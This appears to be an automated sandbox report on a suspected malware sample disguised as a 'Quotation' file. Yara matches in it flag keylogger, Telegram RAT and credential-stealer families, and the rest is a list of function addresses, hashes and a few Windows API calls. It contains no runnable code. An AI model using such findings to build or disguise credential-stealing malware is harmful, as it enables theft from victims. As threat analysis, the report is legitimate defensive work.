Yara matches:	Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.4104956397.0000000002B0E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.1633838435.0000000000452000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000000.1633838435.0000000000452000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000000.1633838435.0000000000452000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000000.1633838435.0000000000452000.00000002.00000001.01000000.00000003.sdmp, Author: unknown Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.4104956397.0000000002991000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	15.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	79
Total number of Limit Nodes:	8

Executed Functions

Function 00C2A088 Relevance: .9, Instructions: 902COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e10256a694abd90049cb9ba15732f0cc586877727c4b00bf2069eddf750a28c8
Instruction ID: c345c7c38fb23023c63dcb28bf33b58c65acc145fa945675d07382e316cdf548
Opcode Fuzzy Hash: e10256a694abd90049cb9ba15732f0cc586877727c4b00bf2069eddf750a28c8
Instruction Fuzzy Hash: 5C828E71A00219DFCB15CFA8E984AAEBBF2FF88310F15855AE4159B661D730ED81CF52

Function 00C269A0 Relevance: .5, Instructions: 520COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3d75fe2937a0a49c7224bc52173d3770a607525c389dbd89138087f4b4af8ad
Instruction ID: 5c1417ccbbe7ce9d5bf6806462ed077672bd7afe887a691ca82bb7b075467526
Opcode Fuzzy Hash: e3d75fe2937a0a49c7224bc52173d3770a607525c389dbd89138087f4b4af8ad
Instruction Fuzzy Hash: A4128E70B002199FDB14DFA9E954BAEBBF2BF88300F248569E815DB791DB309D45CB90

Function 00C26FC8 Relevance: .5, Instructions: 465COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22583fc6b1c230b9d60afe7cde65213d37121cf4fd1263607d7020abeefb205d
Instruction ID: f31c965b333859bc279b4e0bbff29454f23d1120e95844e3c3da762e9b5c7826
Opcode Fuzzy Hash: 22583fc6b1c230b9d60afe7cde65213d37121cf4fd1263607d7020abeefb205d
Instruction Fuzzy Hash: 60126030A04229DFCB15DFA9E984AADBBF2BF88300F258169E815EB661D734DD41CF51

Function 005E743F Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4103379100.00000000005E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1562db593a38bc51fe97ec76deb65122615fa321ac02e63ba8676166b46e12ad
Instruction ID: 0a795f735d780ea8fb549ba9f20076ceaad65191e14625e0d3a4af1c98410067
Opcode Fuzzy Hash: 1562db593a38bc51fe97ec76deb65122615fa321ac02e63ba8676166b46e12ad
Instruction Fuzzy Hash: 8DA1BD35E0035ECFCB05DFA5D854AEDBBB6FF89310F248656E405AB2A1DB30A985CB50

Function 00C2C146 Relevance: .2, Instructions: 231COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdde2cac3159bda8c48459624235fd612ceccb403b9444cffa206607f546c2f8
Instruction ID: ee44c447421dc4b120f5beb63bbe1f423b85e3ab38c8ee04fed9d0f17fd1aa5d
Opcode Fuzzy Hash: cdde2cac3159bda8c48459624235fd612ceccb403b9444cffa206607f546c2f8
Instruction Fuzzy Hash: 13A1E475E04218DFEB14DFAAD884A9DBBF2BF89310F14C16AE419AB361DB309945CF50

Function 00C25362 Relevance: .2, Instructions: 196COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e011d5e6cbd8060d57de6cfc8155e5b5503b14495b761e67c67bd682822c2b4e
Instruction ID: 59c49329032493d533e662767f2ce73452c477059ce490a8c3b2b1af2980e462
Opcode Fuzzy Hash: e011d5e6cbd8060d57de6cfc8155e5b5503b14495b761e67c67bd682822c2b4e
Instruction Fuzzy Hash: D391D674E00658CFDB14DFA9D984A9EBBF2BF89301F24C069D819AB265DB309985CF50

Function 00C2CA08 Relevance: .2, Instructions: 194COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5335bccb9e458b29abe00340fee77b9b1c7687dea785825feb2b6047bcbbf5a9
Instruction ID: 94877934d29620138181e47c06dc1bca293991bd26a88431be132ab08c079918
Opcode Fuzzy Hash: 5335bccb9e458b29abe00340fee77b9b1c7687dea785825feb2b6047bcbbf5a9
Instruction Fuzzy Hash: B091C774E00258CFDB14DFAAD884A9DBBF2BF89300F24C069E819AB365DB309945DF51

Function 00C2C468 Relevance: .2, Instructions: 191COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5896c821f3966e1ca487c6ad2c7c6f91385fa564b7a058510b86ca82c6d8274
Instruction ID: 6ec415e6a54366261e013f83f596c33041e3bcdda6681c9c3e5b557fd6e58cf3
Opcode Fuzzy Hash: a5896c821f3966e1ca487c6ad2c7c6f91385fa564b7a058510b86ca82c6d8274
Instruction Fuzzy Hash: D581B674E00218DFEB14DFAAD984A9DBBF2BF88300F14C169E419AB365DB309945DF51

Function 00C2D278 Relevance: .2, Instructions: 190COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e401adfb73331e03ecf8b91eca7806f4579b939a646eeea3e27574bd1ea3a29a
Instruction ID: 004ffcc8ec6bb5222b7eb1c7506b4ef1ee8ca62943e6ee2a44a74be6091af60d
Opcode Fuzzy Hash: e401adfb73331e03ecf8b91eca7806f4579b939a646eeea3e27574bd1ea3a29a
Instruction Fuzzy Hash: 4D81A674E00218CFEB14DFAAD944A9DBBF2BF99300F24C069D419AB765DB309945CF51

Function 00C2CCD8 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc04b82e9c58b158cda760d2314d137fcdf2ffc97e28348f02aa051a263be886
Instruction ID: 2aad6498a23e929358b020cf33dd0e097175b2b9335e1a99471aa67ea0939ec0
Opcode Fuzzy Hash: cc04b82e9c58b158cda760d2314d137fcdf2ffc97e28348f02aa051a263be886
Instruction Fuzzy Hash: 4481B574E00218DFEB14DFAAD984A9DBBF2BF89300F24C069E419AB365DB305985CF51

Function 00C2C738 Relevance: .2, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29bf01499d9e7e9254b1bc789accbf10524e1dfca1600ef67011a8c6309a7dc5
Instruction ID: 4ccddcd0227f91e11d5427d2fd6dd6198c4ea5e896a2c586e2e4735d21d22798
Opcode Fuzzy Hash: 29bf01499d9e7e9254b1bc789accbf10524e1dfca1600ef67011a8c6309a7dc5
Instruction Fuzzy Hash: B4819574E00218DFEB14DFAAD984A9DBBF2BF88300F24C069D419AB765DB319985CF51

Function 00C2CFAB Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45a162d7ccdfb573c488c242aec2163e6214024e2bfa8c6fed92d2168b465dc1
Instruction ID: 436116e01c3583bfba129c51cbc1ef7ae110197a0037182678ce2ebd1b8725e6
Opcode Fuzzy Hash: 45a162d7ccdfb573c488c242aec2163e6214024e2bfa8c6fed92d2168b465dc1
Instruction Fuzzy Hash: B081A675E00218CFEB18DFAAD984A9DBBF2BF88310F14C069E419AB765DB309945DF50

Function 00C2E988 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a30973be227198f7780506da9dba7c99ece01c6a4505ce3a89190f9444b2182
Instruction ID: e09007e99cee35e921d76c0c2d6dc5a270766fa15ce5287b473a6de06876a216
Opcode Fuzzy Hash: 4a30973be227198f7780506da9dba7c99ece01c6a4505ce3a89190f9444b2182
Instruction Fuzzy Hash: 80518374E00318DFDB18DFAAD894A9DBBB2BF89710F248129E815AB364DB305941CF54

Function 00C2E97B Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66e41aed28cb10f74d9c98ac86b88d4a3f9683c8388bf6469b652d3c3526bba7
Instruction ID: 13fa9c187af1410919baffaf73449cc8379b9939c09d8233ccdc6a521c895abe
Opcode Fuzzy Hash: 66e41aed28cb10f74d9c98ac86b88d4a3f9683c8388bf6469b652d3c3526bba7
Instruction Fuzzy Hash: 11519474E00218DFDB18DFAAD894A9DBBB2BF89700F24C12AE815AB365DB315941CF14

Function 005E4AF8 Relevance: 1.7, APIs: 1, Instructions: 203
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 005E4D5E

Memory Dump Source

Source File: 00000000.00000002.4103379100.00000000005E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Quotation.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: b790dce7b485930efb397ba306d8d64e003cdb9550fff9ecc8da7761979906a6
Instruction ID: 8632b026d7f67a35039ae42c35ba3e21fb627f79fdd943cbeb6082170b3de100
Opcode Fuzzy Hash: b790dce7b485930efb397ba306d8d64e003cdb9550fff9ecc8da7761979906a6
Instruction Fuzzy Hash: 6F813670A00B858FDB28CF2AD54479ABBF1BF88300F108A2ED48AD7A50D774E945CF91

Function 005E509C Relevance: 1.6, APIs: 1, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 005E7202

Memory Dump Source

Source File: 00000000.00000002.4103379100.00000000005E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Quotation.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 78bae4ca4e928d0f251f0e7d0bae1a5b289b2571da369b42202f6d72500dfba9
Instruction ID: 6e3dc2956108a416e85550869f4d39915e0c4c4314322e28ca7665481a01783c
Opcode Fuzzy Hash: 78bae4ca4e928d0f251f0e7d0bae1a5b289b2571da369b42202f6d72500dfba9
Instruction Fuzzy Hash: B151BCB5D04349DFDB18CF9AC884A9EBBB5BF48310F24852AE819AB210D7759845CF90

Function 005E51EC Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 005E9771

Memory Dump Source

Source File: 00000000.00000002.4103379100.00000000005E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Quotation.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: e96b2af9f05f704fa76d5668086ab2724eb7b70934e8ef2ef908d054de9c6255
Instruction ID: 7639686565916f1776b0a2d6f2e8114bbe97087d444d24b2cc302422ede27e0e
Opcode Fuzzy Hash: e96b2af9f05f704fa76d5668086ab2724eb7b70934e8ef2ef908d054de9c6255
Instruction Fuzzy Hash: 67417CB9900345CFDB14CF9AC448AAABBF5FF89314F24C458D559AB361D370A844CFA0

Function 005EBC91 Relevance: 1.6, APIs: 1, Instructions: 78
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleInitialize.OLE32(00000000), ref: 005EBC4D

Memory Dump Source

Source File: 00000000.00000002.4103379100.00000000005E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Quotation.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 103878477a1da0f30b499fe9f62b2a89ba741a128b0198973a254867dc5ef5a3
Instruction ID: 273f6898696843bcdd3e2f1012d3a531aa8d5839751b35d6cc1c107dd3165349
Opcode Fuzzy Hash: 103878477a1da0f30b499fe9f62b2a89ba741a128b0198973a254867dc5ef5a3
Instruction Fuzzy Hash: B4318B75C046898FDB10CFAAD4447CEFFF0EB48310F24845AD499A7251D3796545CFA1

Function 005EBBF1 Relevance: 1.6, APIs: 1, Instructions: 55
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleInitialize.OLE32(00000000), ref: 005EBC4D

Memory Dump Source

Source File: 00000000.00000002.4103379100.00000000005E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Quotation.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 58eb2569e15030e348826eb03cec9bae1ae19f112dd174efd5deaf35c6ef4324
Instruction ID: 561ee1f7adb7c36530f7b07f3869755abe712fe42a854763423bc9e5f1410cdf
Opcode Fuzzy Hash: 58eb2569e15030e348826eb03cec9bae1ae19f112dd174efd5deaf35c6ef4324
Instruction Fuzzy Hash: B41156B5904289CFDB24CF9AD444BDEBFF4EB88321F24845AD548A7210C374A944CFA1

Function 005E4CF8 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 005E4D5E

Memory Dump Source

Source File: 00000000.00000002.4103379100.00000000005E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Quotation.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 9b965a935744d88aa6101287667c0d445ae2d7160443c22ad8cb4e4588169aea
Instruction ID: e2f7a1c49052ecda8f55be5e0e8356c16b4fb10a63793794e18b4f67f38a04d7
Opcode Fuzzy Hash: 9b965a935744d88aa6101287667c0d445ae2d7160443c22ad8cb4e4588169aea
Instruction Fuzzy Hash: 68110FB6C00649CFDB24CF9AD844A9EFBF4AB88310F10841AD858A7200C379A545CFA1

Function 005EADF8 Relevance: 1.5, APIs: 1, Instructions: 46
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleInitialize.OLE32(00000000), ref: 005EBC4D

Memory Dump Source

Source File: 00000000.00000002.4103379100.00000000005E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Quotation.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 67cdd5aac945966c4af6b767bfe5bbe045aed345120ee28d1868662def4b1157
Instruction ID: c6c0ad5f5578e563e1f3f971deab828c4f85b36ab40bb5742ccba749aef0d90b
Opcode Fuzzy Hash: 67cdd5aac945966c4af6b767bfe5bbe045aed345120ee28d1868662def4b1157
Instruction Fuzzy Hash: FA1133B5800749CFDB20DF9AD844B9EBBF8EB48310F208459D558A7300C378A940CFA5

Function 00C28490 Relevance: .7, Instructions: 703
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50c28e87e252d1a6c82aa0d9e5134c75e4a7d411feccf682f9fb68b1dcff7f34
Instruction ID: 6931ac00503af632be46c104912e856c9adf6bd6c506a0c1d29d980341bc8ccb
Opcode Fuzzy Hash: 50c28e87e252d1a6c82aa0d9e5134c75e4a7d411feccf682f9fb68b1dcff7f34
Instruction Fuzzy Hash: CE520F34A002188FEF149BE8D864BAEBB73FF98301F1080A9D50A6B795DF355E859F51

Function 00C2E007 Relevance: .7, Instructions: 654
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ae43fb46db191f61d222dcd8a3f28a94d6d6470a0dc9c2f7563e594c86f09ae
Instruction ID: bdc1d198afdde1ddf9a7165bfdb0a3e75ab15314bbf33fb2e128c6da4d1a9a66
Opcode Fuzzy Hash: 4ae43fb46db191f61d222dcd8a3f28a94d6d6470a0dc9c2f7563e594c86f09ae
Instruction Fuzzy Hash: D112A835021656DFE340ABB0EAAC36E7B60FB2F7277056C5AF00BC04759F71449ACA66

Function 00C2E018 Relevance: .6, Instructions: 647
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5870a646cf264023ade0768c5f840a21bd02ac324478094dfcfd7f311c24dfc9
Instruction ID: cff04abd389d3353a25eaa5570f18d37337bb67d57c64a28ae674dd4c68b8bbc
Opcode Fuzzy Hash: 5870a646cf264023ade0768c5f840a21bd02ac324478094dfcfd7f311c24dfc9
Instruction Fuzzy Hash: D412A835021646DFA240ABB0EAAC36E7B64FB2F7277056C5AF00BC04759F71449ACA66

Function 00C20C8F Relevance: .5, Instructions: 549
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e68a285d4d6bb1345f28e08fa4656598a0d9387060cd8f286cf4607d828a471
Instruction ID: b363c4e31575df43de04dc35f09be7cdfd6c79e2061f0244af92456c92bc269e
Opcode Fuzzy Hash: 7e68a285d4d6bb1345f28e08fa4656598a0d9387060cd8f286cf4607d828a471
Instruction Fuzzy Hash: 9752C774904219DFCB54EF68ED89B9DB7B2FB88701F1046AAD409AB364DB706D85CF80

Function 00C20CA0 Relevance: .5, Instructions: 539
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff7e578dc63e24ae12549cb96cc7b6f52d1a442190130788bfcd3b2f9fcff68c
Instruction ID: d413ec34d13a55b98d67dd7e5413ee968a49cffead1a947352539b0c53b073b9
Opcode Fuzzy Hash: ff7e578dc63e24ae12549cb96cc7b6f52d1a442190130788bfcd3b2f9fcff68c
Instruction Fuzzy Hash: C652B774904219DFCB54EF68ED89B9DB7B2FB88701F1046AAD409AB364DB706D85CF80

Function 00C276F1 Relevance: .5, Instructions: 475COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d76e510154dbf3b9734cabfee4a0a39c85d55f0812dcc78448532972a6add465
Instruction ID: b1b28ca299f82d7d44dbddbb165466816355c426ee5e13e7924236806feb318a
Opcode Fuzzy Hash: d76e510154dbf3b9734cabfee4a0a39c85d55f0812dcc78448532972a6add465
Instruction Fuzzy Hash: 2C125A30A04219DFCB15DF69E9C4AAEBBF1FF88310F148699E815AB6A1D730ED41CB50

Function 00C25F38 Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29ddbb97523bbf15fa703cde855a74db253e5b157926b18371d8c61c6e2d03b4
Instruction ID: d267e07a0ca58032faab475c660b67ad1a889f2b99bc02d0443964425edd7eb7
Opcode Fuzzy Hash: 29ddbb97523bbf15fa703cde855a74db253e5b157926b18371d8c61c6e2d03b4
Instruction Fuzzy Hash: 59B1DD307042209FDB169B79E858B7E7BA2AF89300F14856AE816CB7A1CF34DD41D7A0

Function 00C26498 Relevance: .2, Instructions: 234COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71bb8e208981536ae1eaca8eb671dd98b90697ad40cdf2b702ea14648a9ec1f5
Instruction ID: 027784d47b4e2a413aa6507fa7e5c36dc46e0cb2453bedca1552a66bad2cc63e
Opcode Fuzzy Hash: 71bb8e208981536ae1eaca8eb671dd98b90697ad40cdf2b702ea14648a9ec1f5
Instruction Fuzzy Hash: 6E819434A00525CFCB14DF69E488969B7F2BF89314F248169E416E7B65DB31EC41CBB1

Function 00C229EC Relevance: .2, Instructions: 209COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d80762e940c997c7909c66697eebd29b5d0bf1885bf5a920f3eedb4a867479d
Instruction ID: 4db5f60ba47f2d588815f622ce3a308263fcc3591f410e1aabc34d38d719de8c
Opcode Fuzzy Hash: 7d80762e940c997c7909c66697eebd29b5d0bf1885bf5a920f3eedb4a867479d
Instruction Fuzzy Hash: B2713631E0432D9FDF249BB8A8507AEBBB2BF85310F1441A6C416B7651DB748E85CB92

Function 00C280D8 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de094afe39010e00409c828b8aea2a2238e724d9cc4348f8daf46cebdda94057
Instruction ID: d66db81b3e25268358fec41ab56d772132e2c1bc931f4b178bd44069f043f25a
Opcode Fuzzy Hash: de094afe39010e00409c828b8aea2a2238e724d9cc4348f8daf46cebdda94057
Instruction Fuzzy Hash: 58715834301625CFCB14DF69E888A6E7BE6AF99700B1540A9E812CB7B1DF74DD45CB50

Function 00C2AEF3 Relevance: .2, Instructions: 196COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c2acd5e937f22693460b0b72189de3a107e6f9a29da93c92cacba9a75ef53b7
Instruction ID: 88a9696d7974beee32b66f749df63a640474ecf96fa5be67133b0beb8ec76010
Opcode Fuzzy Hash: 7c2acd5e937f22693460b0b72189de3a107e6f9a29da93c92cacba9a75ef53b7
Instruction Fuzzy Hash: 4861C471B002148FCB05DFB8E958BAEBBB2BFC8310B148169E516D77A1CB359D46CB90

Function 00C2F71F Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 000cd62aaae84083ab3945e426030c7a6a4311ac7467cb6f9e3e6cac28ba7905
Instruction ID: 058124dc0b1c171152bb16131aa13b976db25ee3b873e56f6dae15ac5040f3ed
Opcode Fuzzy Hash: 000cd62aaae84083ab3945e426030c7a6a4311ac7467cb6f9e3e6cac28ba7905
Instruction Fuzzy Hash: 3F61F274D00318CFEB15DFA9D854BADBBB2FF89304F208529E805AB294DB755986CF40

Function 00C29C30 Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99ba9131c4398b3f7f74e248e63a9fdf23860945cebf6f73170e565c1eae3df7
Instruction ID: 219d1f7ef1bcc8722546a904b000f5f35c408a2e0fda35f125fbb6711c5aae70
Opcode Fuzzy Hash: 99ba9131c4398b3f7f74e248e63a9fdf23860945cebf6f73170e565c1eae3df7
Instruction Fuzzy Hash: BF51BF307002249FDB01DF69E884BAEBBE6EF89311F148466E919CB355DB71CD01EBA1

Function 00C24193 Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd

Similarity

API ID:
String ID:
